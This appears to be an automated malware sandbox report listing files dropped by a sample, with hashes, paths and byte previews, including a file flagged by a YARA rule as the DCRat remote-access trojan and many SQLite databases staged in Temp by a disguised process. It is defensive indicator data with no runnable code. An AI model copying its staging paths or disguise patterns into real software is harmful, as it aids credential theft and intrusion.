                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                  Entropy (8bit):1.307335229380231
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvry:KooCEYhgYEL0In
                                                                                                                                                                  MD5:25F2ED8BAA47434228192827DC1CFC20
                                                                                                                                                                  SHA1:37DC6735B79D4352405EF139FCA9D881BB1CBC4F
                                                                                                                                                                  SHA-256:5BAD1C2CEE41CEF395E6D0F5FD440944C457C1E943FB367C223E9DC0183961D0
                                                                                                                                                                  SHA-512:B3017A4F806E1197A35EFF6C363560C7541A6952D6AFCCA7529A81836D3C8BED184D55D9622296BD54A5A9B6760B0086D17559E694F5B31B1DF1A3287B029219
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7e9ef21f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                  Entropy (8bit):0.42212669716823814
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                                                                                  MD5:9AF8A1ECF62E802651B061CAF9294E7D
                                                                                                                                                                  SHA1:165DB6293A20A16E87775C390F113552A3338EC3
                                                                                                                                                                  SHA-256:DFD3940B887D1704FA8C77C713276451CD3CA1AF3CDEBA3C2155C74A9D97FE59
                                                                                                                                                                  SHA-512:56C6A887B4F2666E44D52F5A142454447DD3A31D695CE7EE9D717A91F5765B7AE85472F9E3147924A041032740D0966DE766BCD5115B73B1E4A9CCB9874072DA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:~...... .......A.......X\...;...{......................0.!..........{A......}A.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................^.....};.................TFvU.....}A..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.0763974471616752
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:hyW8YeDJq+xjn13a/NJqlXallcVO/lnlZMxZNQl:hSzDJFx53q7Oewk
                                                                                                                                                                  MD5:FC932DC6019C63680A2FC99BEFE0342B
                                                                                                                                                                  SHA1:1A494923A104A192DF699CDE4246AF0289C2545E
                                                                                                                                                                  SHA-256:A1C0C6B5AD6054687D83C2A29989FC2A0BD80747DFBB517151FD00A295F43FB7
                                                                                                                                                                  SHA-512:EA10A53541D83272BA086451DEEB052D36AEE598FBB2726484FF69FB4CE301BEB2A7329D474761AED3205D4161F6B33DEB17905F0B3F3DC874680D4B1D8DC8F1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:g..W.....................................;...{.......}A......{A..............{A......{A..........{A]................TFvU.....}A.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\Public\7ccfebd9e92364

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):277
                                                                                                                                                                  Entropy (8bit):5.83230028259679
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:jSkAzbryYmWWLUcYdUEeTtn8hREUhB82q8e4kBuoeXUXvAj6GcA3gO:jSkuNl/c6sqEQQ54kBIkvAu0QO
                                                                                                                                                                  MD5:5AA4ECD23BC09EDB453DD40FEC63CA35
                                                                                                                                                                  SHA1:10E43E3085677C24BF0F09CE7EE05E231CA16564
                                                                                                                                                                  SHA-256:AD931BEA02746DC936947503FA199775403128B49F6849DFFEB06A118AEEA4E9
                                                                                                                                                                  SHA-512:F43E6449775F5B3CD15AA503CA35A9FA4D5738BB894C7B7A5E0130C3AE73AB85C0E4EF8B21A4740A2689631472C73F732D6D2F814CC377E960DF84DB953CDED3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2uzm7oUU5ACPrqZ6Rd6ZPvFIVFBQI8McG4ybhZ4pCIJj5YAgGamKLgBHprR1mEL6yjJx17Y2jRWHlfM6FeJsWBRj3rw0HDC87NvWPNpIBtl4J3fJeVvH4djxSj3KLivgOYKXu0q2zAqmaWZ9LmWwR4Ddn7EqTe6d8FpvtHZno2S4w6X5J49jM8OUUquwvAjVDNoUroPDMsIZmJrqkJhYfXQ90VbDXm1nS60iSCNfo5Wd0zrK9DLmdK0q6oeWMLpk1eGqSIYi5BujAxJBnQETa

                                                                                                                                                                  C:\Users\Public\UserOOBEBroker.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Public\UserOOBEBroker.exe, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@...................................'.W.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H............,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Users\Public\UserOOBEBroker.exe:Zone.Identifier

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zZ1Y43bxxV.exe.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1698
                                                                                                                                                                  Entropy (8bit):5.367720686892084
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                                                                                                                                  MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                                                                                                                                  SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                                                                                                                                  SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                                                                                                                                  SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                  MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...e.................................X..............@..........

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\006rvF0CoX

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\0LH9drUdbK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\0SFCYeO4Ir

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\0g7Fxpwht9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\0zuUE3zVpn

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1D83jOvnrB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1FngSs4A57

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1VWfgP5eaK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1lmUz2ftMv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1wSDReJLyk

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\25mMZHCHT1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2DqiK7Wodf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
